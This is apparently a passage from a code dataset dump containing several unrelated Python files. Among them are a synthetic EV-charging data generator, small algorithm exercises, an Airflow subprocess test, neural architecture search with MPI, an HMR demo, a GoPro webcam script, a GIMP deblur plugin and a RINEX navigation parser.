csv.writer(f)\r\n header = ['VID','type','battery', 'iSoC','finalcharge ','charged amount','start time','stop time','duration','power_con','year','month','day', 'hour','minute']\r\n writer.writerow(header)\r\nseed(1)\r\n\r\nfor j in range(10000000):\r\n for i in range(len(Vlist)):\r\n intialcharge = x = randint(20, 50)\r\n \r\n finalcharge = randint(x,100)\r\n charge_total = finalcharge-intialcharge\r\n hour = t = base.hour\r\n start_time = float(t)\r\n \r\n duration = (charge_total*5)/100\r\n stop_time = start_time + duration\r\n #battery = randint(1,100)\r\n #battery = np.random.choice(Mbatlist)\r\n \r\n #print(\"base hour:\" + str(z))\r\n \r\n \r\n if (hour>0 and hour<=5):\r\n \r\n battery = random.uniform(80.0, 225.0)\r\n if (battery>80 and battery<150):\r\n vtype = 'TruckL/Dcm'\r\n power_con = 0.125*duration\r\n if (battery>151 and battery<200):\r\n vtype = 'TruckM'\r\n power_con = 1.18*duration\r\n if (battery>201 and battery<225): \r\n vtype = 'TruckH'\r\n power_con = 2.5*duration\r\n \r\n if (hour>5 and hour<=21):\r\n battery = random.uniform(1.0, 80.0)\r\n if (battery>0.9 and battery<4.7):\r\n vtype = 'bike'\r\n power_con = 0.22*duration\r\n if (battery>4.8 and battery<10):\r\n vtype = 'rickshaw'\r\n power_con = 0.32*duration\r\n if (battery>10 and battery<40):\r\n vtype = 'car'\r\n power_con = 0.33*duration\r\n if (battery>40 and battery<79):\r\n vtype = 'bus'\r\n power_con = 0.75*duration\r\n \r\n if (hour>21 and hour<=0):\r\n #else:\r\n battery = random.uniform(10,250)\r\n if (battery>10 and battery<100):\r\n vtype = 'car'\r\n power_con = 0.33*duration\r\n if (battery>100 and battery<200):\r\n vtype = 'bus'\r\n power_con = 0.75*duration\r\n if (battery>200):\r\n vtype = 'TruckH'\r\n power_con = 2.5*duration \r\n \r\n \r\n data = [Vlist[i], vtype, battery, intialcharge, finalcharge, charge_total, start_time, stop_time, duration,power_con,base.year, base.month, base.day, base.hour, base.minute ]\r\n \r\n \r\n \r\n with open(filename, 'a', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f) \r\n # write the data\r\n writer.writerow(data)\r\n print(\"Data written to file\")\r\n \r\n base = base+delta\r\n if(base > end):\r\n print('Generated data')\r\n break\r\n#x = np.random.choice(array, size=1)\r\n\r\n\r\n","sub_path":"vtrial.py","file_name":"vtrial.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"461692269","text":"\"\"\" chessKnight.py\n\n__author__ = \"Albert D. Holmes\"\n__reference__ = \"https://app.codesignal.com/tournaments/wXFfAbSLArkAcTdwD/A\"\n\n\"\"\"\n\n\ndef chessKnight(cell):\n row = ord(cell[1]) - ord('0')\n column = ord(cell[0]) - ord('a') + 1\n steps = [\n [-2, -1], [-1, -2], [1, -2], [2, -1],\n [2, 1], [1, 2], [-1, 2], [-2, 1]\n ]\n answer = 0\n\n for i in range(len(steps)):\n tmpRow = row + steps[i][0]\n tmpColumn = column + steps[i][1]\n if (tmpRow >= 1 and tmpRow <= 8 and\n tmpColumn >= 1 and tmpColumn <= 8):\n answer += 1\n\n return answer\n\n","sub_path":"Easy/chessKnight.py","file_name":"chessKnight.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351896640","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nimport unittest\nfrom subprocess import CalledProcessError\n\nfrom airflow.utils import process_utils\n\n\nclass TestExecuteInSubProcess(unittest.TestCase):\n\n def test_should_print_all_messages1(self):\n with self.assertLogs(process_utils.log) as logs:\n process_utils.execute_in_subprocess([\"bash\", \"-c\", \"echo CAT; echo KITTY;\"])\n\n msgs = [record.getMessage() for record in logs.records]\n\n self.assertEqual([\n \"Executing cmd: bash -c 'echo CAT; echo KITTY;'\",\n 'Output:',\n 'CAT',\n 'KITTY'\n ], msgs)\n\n def test_should_raise_exception(self):\n with self.assertRaises(CalledProcessError):\n process_utils.execute_in_subprocess([\"bash\", \"-c\", \"exit 1\"])\n","sub_path":"tests/utils/test_process_utils.py","file_name":"test_process_utils.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182206886","text":"from mpi4py import MPI\nfrom useful_functions import *\nimport globalvars\nimport math\nimport pandas\nfrom sklearn.model_selection import train_test_split\nfrom keras.optimizers import Nadam\nfrom keras.optimizers import Adam\nfrom keras.optimizers import RMSprop\nfrom keras.models import load_model\nfrom keras.models import model_from_json\nfrom hyperopt import Trials, STATUS_OK, tpe, rand\nfrom hyperas import optim\nfrom hyperas.distributions import choice, uniform\nfrom random import *\n\ndef activation_wrapper(name):\n\n if name == 'leakyrelu':\n return LeakyReLU()\n else:\n return Activation(name)\n\n\ndef model_adaptivity_hyperas_recycle(inputs, outputs, score_threshold, model_evals, max_num_layers, early_stopping=False, probability_model=False):\n\n n_inputs = inputs.shape[0]\n input_dimension = inputs.shape[1]\n n_nodes = math.floor( math.sqrt(n_inputs) )\n\n [X_train, y_train, X_test, y_test] = e3b3_data()\n\n mpi_comm_size = MPI.COMM_WORLD.Get_size()\n mpi_rank = MPI.COMM_WORLD.Get_rank()\n if MPI.Is_initialized() and 0==mpi_rank :\n print(\"MPI is initialized with \", mpi_comm_size, \" processes\", flush=True)\n globalvars.n_hidden_layers = 1\n #globalvars.model = []\n\n scores_loc = np.zeros( mpi_comm_size )\n scores_glob = np.zeros( mpi_comm_size )\n MPI.COMM_WORLD.Barrier()\n\n [best_run, model] = optim.minimize(model=create_model_recycle, data=e3b3_data, algo=rand.suggest, max_evals=model_evals, trials=Trials(), verbose=False)\n \n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n scores_loc[mpi_rank] = score\n \n MPI.COMM_WORLD.Allreduce(scores_loc, scores_glob, op=MPI.SUM)\n best_proc = np.argmax(scores_glob)\n\n if 0 == mpi_rank: \n print(\"Toral number of layers: \", globalvars.n_hidden_layers, flush=True)\n print(\"Scores_glob: \", scores_glob, flush=True)\n print(\"Score: \", np.max(scores_glob), flush=True)\n\n best_run = MPI.COMM_WORLD.bcast(best_run, root=best_proc) \n model = MPI.COMM_WORLD.bcast(model, root=best_proc) \n\n MPI.COMM_WORLD.Barrier()\n if 0 == mpi_rank:\n model_json = model.to_json()\n with open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n while np.max(scores_glob) < score_threshold and globalvars.n_hidden_layers < max_num_layers :\n\n MPI.COMM_WORLD.Barrier()\n if 0 == mpi_rank:\n globalvars.n_hidden_layers += 1\n\n [best_run, model] = optim.minimize(model=create_model_recycle, data=e3b3_data, algo=rand.suggest, max_evals=model_evals, trials=Trials(), verbose=False) \n\n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n scores_loc[mpi_rank] = score\n MPI.COMM_WORLD.Allreduce(scores_loc, scores_glob, op=MPI.SUM)\n best_proc = np.argmax(scores_glob)\n\n if 0 == mpi_rank: \n print(\"Toral number of layers: \", globalvars.n_hidden_layers, flush=True)\n print(\"Scores_glob: \", scores_glob, flush=True)\n print(\"Score: \", np.max(scores_glob), flush=True)\n\n best_run = MPI.COMM_WORLD.bcast(best_run, root=best_proc) \n model = MPI.COMM_WORLD.bcast(model, root=best_proc) \n if 0 == mpi_rank:\n model_json = model.to_json()\n with open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n \n if 0==mpi_rank:\n print(\"Best performing model chosen hyper-parameters:\", flush=True)\n print(best_run)\n\n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n\n return [best_run, model]\n\n\ndef create_model_recycle(X_train, y_train, X_test, y_test):\n\n num_current_layers = globalvars.n_hidden_layers - 1\n \n model = Sequential()\n nodes_choice = [128,256,512,1024]\n activation_functions = ['relu', 'sigmoid', 'tanh']\n\n #first layer: the dimension of the input must be specified in the first layer\n #in this case the input is made of scalars, i.e. dimension equal to 1\n #model.add( Dense(X_train.shape[0], input_dim=X_train.shape[1], activity_regularizer=regularizers.l2({{uniform(0,0.01)}})) )\n #model.add( activation_wrapper({{choice(['relu', 'sigmoid', 'tanh', 'leakyrelu'])}}) )\n loaded_model = []\n\n mpi_rank = MPI.COMM_WORLD.Get_rank()\n if 0==mpi_rank and num_current_layers>0:\n json_file = open('model.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n\n loaded_model = MPI.COMM_WORLD.bcast(loaded_model, root=0) \n n_layers = 0\n\n if num_current_layers > 0:\n n_layers = len(loaded_model.layers)-1\n else:\n random_index = randrange(len(nodes_choice))\n num_nodes = nodes_choice[random_index]\n model.add( Dense(num_nodes, input_dim=X_train.shape[1]) )\n random_index = randrange(len(activation_functions))\n activation_function = activation_functions[random_index]\n model.add( Activation(activation_function) )\n\n for layer_size in range(n_layers):\n if layer_size%2==0:\n model.add( Dense.from_config( loaded_model.layers[layer_size].get_config() ) )\n else:\n model.add( Activation.from_config( loaded_model.layers[layer_size].get_config() ) )\n\n random_index = randrange(len(nodes_choice))\n num_nodes = nodes_choice[random_index]\n random_index = randrange(len(activation_functions))\n activation_function = activation_functions[random_index]\n model.add( Dense(num_nodes) )\n model.add( Activation(activation_function) )\n\n #last layer\n model.add( Dense(1) )\n\n #batch size is critical tu save model from GPus into a file\n batch_sizes = [128, 256, 512, 1024] \n random_index = randrange(len(batch_sizes))\n batch = batch_sizes[random_index]\n\n model.compile(loss='mse',optimizer=Adam(lr=0.0001)) \n callback_fun = keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=math.floor( math.sqrt(X_train.shape[0]) ), verbose=0, mode='auto', baseline=None, restore_best_weights=True)\n #result = model.fit(X_train, y_train, batch_size=batch, epochs=int(math.sqrt(X_train.shape[0])), verbose=0, validation_split=0.1, callbacks=[callback_fun])\n result = model.fit(X_train, y_train, batch_size=batch, epochs=X_train.shape[0], verbose=0, validation_split=0.1, callbacks=[callback_fun])\n #result = model.fit(X_train, y_train, batch_size=batch, epochs=1, verbose=0, validation_split=0.1, callbacks=[callback_fun])\n accuracy = model.evaluate(X_test, y_test, verbose=0)\n return {'loss': -accuracy, 'status': STATUS_OK, 'model': model}\n \n\n\n\n\n\n\n\n\n\n\n","sub_path":"MC_NN_Massi/python_utilities/NN_architecture_hyperas_MPI_recycle.py","file_name":"NN_architecture_hyperas_MPI_recycle.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319762667","text":"\"\"\"\nDemo of HMR.\n\nNote that HMR requires the bounding box of the person in the image. The best performance is obtained when max length of the person in the image is roughly 150px.\n\nWhen only the image path is supplied, it assumes that the image is centered on a person whose length is roughly 150px.\nAlternatively, you can supply output of the openpose to figure out the bbox and the right scale factor.\n\nSample usage:\n\n# On images on a tightly cropped image around the person\npython -m demo --img_path data/im1963.jpg\npython -m demo --img_path data/coco1.png\n\n# On images, with openpose output\npython -m demo --img_path data/random.jpg --json_path data/random_keypoints.json\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nfrom absl import flags\nimport numpy as np\nimport pickle\n\nimport skimage.io as io\nimport tensorflow as tf\n\nfrom src.util import image as img_util\nfrom src.util import openpose as op_util\nimport src.config\nfrom src.RunModel import RunModel\n\nflags.DEFINE_string('img_path', 'data', 'Directory of images to run')\nflags.DEFINE_string('json_path', 'openpose', 'If specified, uses the openpose output to crop the image.')\nflags.DEFINE_string('pkl_path', 'data', 'output pkl')\n\n\ndef preprocess_image(img_path, json_path=None):\n img = io.imread(img_path)\n if img.shape[2] == 4:\n img = img[:, :, :3]\n\n if json_path is None:\n if np.max(img.shape[:2]) != config.img_size:\n print('Resizing so the max image size is %d..' % config.img_size)\n scale = (float(config.img_size) / np.max(img.shape[:2]))\n else:\n scale = 1.\n center = np.round(np.array(img.shape[:2]) / 2).astype(int)\n # image center in (x,y)\n center = center[::-1]\n else:\n scale, center = op_util.get_bbox(json_path)\n\n if scale is None:\n return None, None, None\n\n crop, proc_param = img_util.scale_and_crop(img, scale, center,\n config.img_size)\n\n # Normalize image to [-1, 1]\n crop = 2 * ((crop / 255.) - 0.5)\n\n return crop, proc_param, img\n\n\ndef main(img_path, pkl_path, json_path):\n sess = tf.Session()\n model = RunModel(config, sess=sess)\n\n count = len(os.listdir(json_path))\n for ix, f in enumerate(os.listdir(json_path)):\n if not f.endswith(\".json\"):\n continue\n\n print('Processing %d/%d: %s' % (ix+1, count, f))\n\n js = os.path.join(json_path, f)\n\n fname = f.replace('_keypoints.json', '.jpg')\n img = os.path.join(img_path, fname)\n\n input_img, proc_param, img = preprocess_image(img, js)\n if input_img is None:\n print('no keypoints')\n continue\n\n # Add batch dimension: 1 x D x D x 3\n input_img = np.expand_dims(input_img, 0)\n joints, verts, cams, joints3d, theta = model.predict(input_img, get_theta=True)\n\n out_name = f.replace('_keypoints.json', '_mesh.pkl')\n out_path = os.path.join(pkl_path, out_name)\n\n with open(out_path, 'wb') as outf:\n pickle.dump([joints, verts, cams, joints3d, theta], outf)\n\n\nif __name__ == '__main__':\n config = flags.FLAGS\n config(sys.argv)\n # Using pre-trained model, change this to use your own.\n config.load_path = src.config.PRETRAINED_MODEL\n config.batch_size = 1\n\n main(config.img_path, config.pkl_path, config.json_path)\n","sub_path":"demo_batch.py","file_name":"demo_batch.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"543545656","text":"\"\"\" Functions Map \"\"\"\ndef searchingAlgorithms():\n return [\n ('Binary Search', 'binarySearch')\n ]\n\n\"\"\" Binany Search \"\"\"\ndef binarySearch(array, item):\n first = 0\n last = len(array)-1\n found = False\n\n while first<=last and not found:\n midpoint = (first + last)//2\n if array[midpoint] == item:\n found = True\n else:\n if item < array[midpoint]:\n last = midpoint-1\n else:\n first = midpoint+1\n\n return found\n","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91305335","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 10:27:21 2017\n\n@author: SRG\n\"\"\"\n\nimport cv2\nimport os\n\nOUTPUT_DIR = 'E:/ParkingSlotDetection/db/[20171222]_LG_AVM/rectified/set1'\nif os.path.isdir(OUTPUT_DIR) == False:\n os.mkdir(OUTPUT_DIR)\n \ncap = cv2.VideoCapture('E:/ParkingSlotDetection/db/[20171222]_LG_AVM/2017.12.22 09.38.45.mp4')\n\nidx = 0\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n \n if frame is not None:\n frame[315:781,856:1067,:] = 0\n img = frame[:,663:1260,:]\n img = cv2.resize(cv2.flip(cv2.transpose(img),0), (392,240))\n cv2.imwrite('{}/{:08d}.png'.format(OUTPUT_DIR,idx), img)\n cv2.imshow('frame',img)\n idx += 1 \n cv2.waitKey(1)\n \ncap.release()\ncv2.destroyAllWindows()","sub_path":"utils/video2image.py","file_name":"video2image.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95491106","text":"# Here is where the initial conditions of the electron are defined\n# This filename is the input parameter of the eTracks.py file\n\nr_0 = 0.779792 # 0.767132 #initial radius in c/w_p\nvr_0 = (r_0 - 0.776168)/(837.322 - 837.317)\nvz_0 = -1 # set arbitrarily when p < 1\npr_0 = 1.10027 # initial momentum in m_e c\npz_0 = -0.0445353\nxi_0 = 6.47308 # initial xi-position in c/w_p\nSHModel = False # True to use SHM model, False to use OSIRIS fields\ntrack = 'max' # name of track if applicable\n","sub_path":"input/max2.py","file_name":"max2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"385891267","text":"# 15. 末尾のN行を出力\n# 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.\n# 確認にはtailコマンドを用いよ.\n\nfrom knock10 import read_file\nimport sys\n\ndef tail(target: str, line: int) -> str:\n target = target.split(\"\\n\")\n return \"\\n\".join(target[len(target)-line:])\n\nif __name__ == \"__main__\":\n args = sys.argv\n n = int(args[1])\n target = read_file(\"hightemp.txt\")\n print(tail(target, n))","sub_path":"takahashi/chapter02/knock15.py","file_name":"knock15.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42443880","text":"from tkinter import *\n \n \nroot = Tk()\n \n \ndef open_file():\n file_1 = open(file_name.get())\n file_content.insert(1.0, file_1.read())\n \ndef save_file():\n file_2 = open(file_name.get(), 'w')\n file_2.write(file_content.get(1.0, END))\n \n \nroot.title('Copying')\n \nframe = Frame()\nframe_file_content = Frame()\n \nfile_name = Entry(frame, bd=4, relief=GROOVE, width='25')\n \nbutton_open = Button(frame, text=' Open the old file ', command=open_file)\nbutton_save = Button(frame, text=' Save to new one ', command=save_file)\n \nfile_content = Text(frame_file_content, bg='#FFFFE0', width='50', height='20', wrap=NONE)\n \nYscroll = Scrollbar(frame_file_content, command=file_content.yview)\nXscroll = Scrollbar(orient=HORIZONTAL, command=file_content.xview)\n \nfile_content.configure(yscrollcommand=Yscroll.set, xscrollcommand=Xscroll.set)\n \n \nframe.pack()\nfile_name.pack(side=LEFT)\nbutton_open.pack(side=LEFT)\nbutton_save.pack(side=LEFT)\nframe_file_content.pack(fill=BOTH, expand=1)\nfile_content.pack(side=LEFT, fill=BOTH, expand=1)\nYscroll.pack(side=LEFT, fill=Y)\nXscroll.pack(side=BOTTOM, fill=X)\n \n \nroot.mainloop()","sub_path":"redaktor_v2.py","file_name":"redaktor_v2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151956161","text":"import json\n\n\ndef loadPoints(filename, type):\n with open(\"routes/\" + filename) as f:\n raw_json = f.read()\n json_object = json.loads(raw_json)\n raw_points = json_object[type]\n\n points = []\n for raw_point in raw_points:\n points.append({\n \"id\": int(raw_point['id'].encode('ascii')),\n \"lat\": float(raw_point['lat']),\n \"lon\": float(raw_point['lon'])\n })\n return points","sub_path":"dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"338476296","text":"import argparse\n\ndef parseArgs():\n parser = argparse.ArgumentParser(\n description=\"Translates a single character to it's ASCII Equivalent\"\n )\n\n parser.add_argument('char',help='Character to be translated to ASCII')\n\n types = parser.add_mutually_exclusive_group()\n\n types.add_argument('--hex',help=\"Return value in hexadecimal\",action='store_true')\n types.add_argument('--oct',help=\"Return value in octal\",action='store_true')\n\n return parser.parse_args()\n\ndef main():\n\n args = parseArgs()\n if(len(args.char) > 1):\n print(\"Error: Too many characters\")\n return 1\n\n dec = ord(args.char)\n\n if(args.hex):\n print(hex(dec))\n return 0\n\n if(args.oct):\n print(oct(dec))\n return 0\n\n print(dec)\n return 0\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ascii_me.py","file_name":"ascii_me.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87190561","text":"from typing import Callable, Any\nfrom rx.core import ObservableBase, AnonymousObservable\nfrom rx.core.typing import Mapper\n\n\ndef from_callback(func: Callable, mapper: Mapper = None) -> \"Callable[[...], ObservableBase]\":\n \"\"\"Converts a callback function to an observable sequence.\n\n Keyword arguments:\n func -- Function with a callback as the last parameter to\n convert to an Observable sequence.\n mapper -- [Optional] A mapper which takes the arguments\n from the callback to produce a single item to yield on next.\n\n Returns a function, when executed with the required parameters minus\n the callback, produces an Observable sequence with a single value of\n the arguments to the callback as a list.\n \"\"\"\n\n def function(*args):\n arguments = list(args)\n\n def subscribe(observer, scheduler=None):\n def handler(*args):\n results = list(args)\n if mapper:\n try:\n results = mapper(args)\n except Exception as err:\n observer.on_error(err)\n return\n\n observer.on_next(results)\n else:\n if isinstance(results, list) and len(results) <= 1:\n observer.on_next(*results)\n else:\n observer.on_next(results)\n\n observer.on_completed()\n\n arguments.append(handler)\n func(*arguments)\n\n return AnonymousObservable(subscribe)\n return function\n","sub_path":"rx/operators/observable/fromcallback.py","file_name":"fromcallback.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"89563797","text":"# from tensorflow.python import pywrap_tensorflow\n# import os\n# model_dir = './faceres/log/'\n# checkpoint_path = os.path.join(model_dir, \"model.ckpt-400.data-00000-of-00001\")\n# reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)\n# var_to_shape_map = reader.get_variable_to_shape_map()\n# for key in var_to_shape_map:\n# print(\"tensor_name: \", key)\n\nimport tensorflow as tf\nimport os\n\nlogdir='./face72/facell/'\n\nfrom tensorflow.python import pywrap_tensorflow\n\nckpt = tf.train.get_checkpoint_state(logdir)\n\n# global_step=ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n# print('global_step',global_step)\nreader = pywrap_tensorflow.NewCheckpointReader(ckpt.model_checkpoint_path)\nvar_to_shape_map = reader.get_variable_to_shape_map()\nfor key in var_to_shape_map:\n print(\"tensor_name: \", key)\n print(reader.get_tensor(key).shape)","sub_path":"face_into/face72/read_ckpt2.py","file_name":"read_ckpt2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216759879","text":"#!/usr/bin/env python2\nimport sys\nfrom os.path import dirname, realpath\n\nsys.path.append(realpath(dirname(__file__)))\nfrom gimpfu import main\nfrom _plugin_base import GimpPluginBase\n\n\nclass Deblur(GimpPluginBase):\n def run(self):\n self.model_file = 'DeblurGANv2.py'\n result = self.predict(self.drawable)\n self.create_layer(result)\n\n\nplugin = Deblur()\nplugin.register(\n proc_name=\"deblur\",\n blurb=\"deblur\",\n help=\"Running deblurring.\",\n author=\"Kritik Soman\",\n copyright=\"\",\n date=\"2020\",\n label=\"deblur...\",\n imagetypes=\"RGB*\"\n)\nmain()\n","sub_path":"plugins/deblur.py","file_name":"deblur.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42128830","text":"import sys\n\nf=open('graph2.txt')\nf=f.read().strip('\\n').split()\nf=list(map(lambda x:x.split('->'),f))\nindegs=[[]for i in range(10000)]\noutdegs=[[]for i in range(10000)]\nt1=0\ncnt_edges=0\nvs=set([])\n\ndef dfs(u):\n global flag2\n visited[u]=1\n for v in outdegs[u]:\n if visited[v]==0:\n dfs(v)\n return visited\n\ndef seiri():\n global vs\n for i in sorted(vs.copy()):\n if i!=0 and len(indegs[i])==0:\n outdegs[i]=[]\n vs.remove(i)\n seiri()\n return vs\n\n#グラフの作成\nfor i in f:\n visited=[0]*10000\n u,v=i[0],int(i[1])\n if u[0]==\"!\":\n try:\n u=int(u[1:])\n outdegs[u].remove(v)\n indegs[v].remove(u)\n except ValueError:\n pass\n else:\n u=int(u)\n outdegs[u].append(v)\n indegs[v].append(u)\n vs.add(u)\n vs.add(v)\n #ルート集合のindexを作成\n seiri()\n for i,v in enumerate(ans):\n if v==1:\n routes.append(i)\n for i in vs.copy():\n if i not in routes:\n vs.remove(i)\n for i in range(len(outdegs)):\n if i not in routes:\n outdegs[i]=[]\n for i in range(len(indegs)):\n if i not in routes:\n indegs[i]=[]\n\n t1+=1\n\n\n#有効辺の数数える\nfor i in outdegs:\n cnt_edges+=len(i)\nprint('有向辺の数:',cnt_edges)\n\n#頂点の数を数える\nprint(\"頂点の数:\",len(vs))\n\n","sub_path":"utokyo_ist_pastexam/2010_2/3-1.py","file_name":"3-1.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25235066","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nf = lambda x: 3*x**2 - 5\n\nx = np.arange(-5, 5, .05)\n\ndef bisec(f, a, b, tol):\n \n if f(a)*f(b) >= 0 :\n print(\"não há raíz no intervalo\")\n \n medio = (a + b)/2\n \n if np.abs(f(medio)) < tol:\n return medio\n \n elif np.sign(f(a)) == np.sign(f(medio)):\n return bisec(f, medio, b, tol)\n \n elif np.sign(f(b)) == np.sign(f(medio)):\n return bisec(f, a, medio, tol)\n","sub_path":"Chapter7/Exercise4.py","file_name":"Exercise4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42427636","text":"from signal import signal, SIGINT\nfrom goprocam import GoProCamera, constants\n\ndef handler(s, f):\n gopro.stopWebcam()\n quit()\n\nsignal(SIGINT, handler)\n\ngopro = GoProCamera.GoPro(ip_address=GoProCamera.GoPro.getWebcamIP())\ngopro.startWebcam(constants.Webcam.Resolution.R720p)\ngopro.webcamFOV(constants.Webcam.FOV.Linear)\ngopro.getWebcamPreview()\ngopro.KeepAlive()\n","sub_path":"examples/launch_webcam_preview.py","file_name":"launch_webcam_preview.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"41435226","text":"'''\nCopyright 2019 Penina Axelrad, Ryan Kain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n\nfrom datetime import datetime\nimport re\n\n\nblank_expr = re.compile('([0-9]+)X')\nvalue_expr = re.compile('([0-9]+)?([SIFD]{1}[0-9]+)(\\.[0-9]+)?')\n\n\ndef parse_rinex_line(line, line_format):\n '''\n Given the RINEX 2 navigation message line and\n line format string, parses and returns list of\n data in that line\n\n Parameters\n ----------\n line : str\n Line to parse into nav data\n \n line_format: array_like\n Line format used to describe data contents\n\n Returns\n -------\n list\n Vector of the form [header, nav_data] where header is a list\n containing the parsed header information and nav_data is a\n dictionary containing a list of the navigation records for each\n sat_id.\n '''\n \n line_components = line_format.split(',')\n values = []\n \n # find the letter format specifier\n for expr in line_components:\n blank_match = blank_expr.match(expr)\n if blank_match is not None:\n num_blank = int(blank_match.groups()[0])\n line = line[num_blank:]\n continue\n value_match = value_expr.match(expr)\n if value_match is not None:\n groups = value_match.groups()\n multiple = int(groups[0]) if groups[0] is not None else 1\n val_type = groups[1][0]\n length = int(groups[1][1:])\n precision = int(groups[2][1:]) if groups[2] is not None else 0\n for i in range(multiple):\n x = line[:length].strip()\n if x == '':\n value = None\n elif val_type is 'S':\n value = x\n elif val_type is 'I':\n value = int(x)\n elif val_type is 'F':\n value = float(x)\n elif val_type is 'D':\n value = float(x.replace('D', 'E'))\n values.append(value)\n line = line[length:]\n return values\n\nrinex2_nav_record_line_formats = [\n 'I2,1X,I2.2,1X,I2,1X,I2,1X,I2,1X,I2,F5.1,3D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n '3X,4D19.12',\n]\n\nrinex2_nav_record_var_names = [\n ['prn', 'yy', 'month', 'day', 'hour', 'minute', 'second', 'a0', 'a1', 'a2'],\n ['iode1', 'c_rs', 'delta_n', 'm_0',],\n ['c_uc', 'e', 'c_us', 'sqrt_a',],\n ['t_oe', 'c_ic', 'omega_0', 'c_is',],\n ['i_0', 'c_rc', 'omega', 'omega_dot',],\n ['i_dot', 'l2_codes', 'week', 'l2p_data',],\n ['accuracy', 'health', 'tgd', 'iodc',],\n ['transmit_time', 'fit_interval'],\n]\n\ndef parse_RINEX2_nav_records(lines):\n '''\n Given the lines corresponding to navigation data records \n from a RINEX 2 Nav file, parses the records and returns \n a list of dictionaries with their contents.\n\n Parameters\n ----------\n lines : 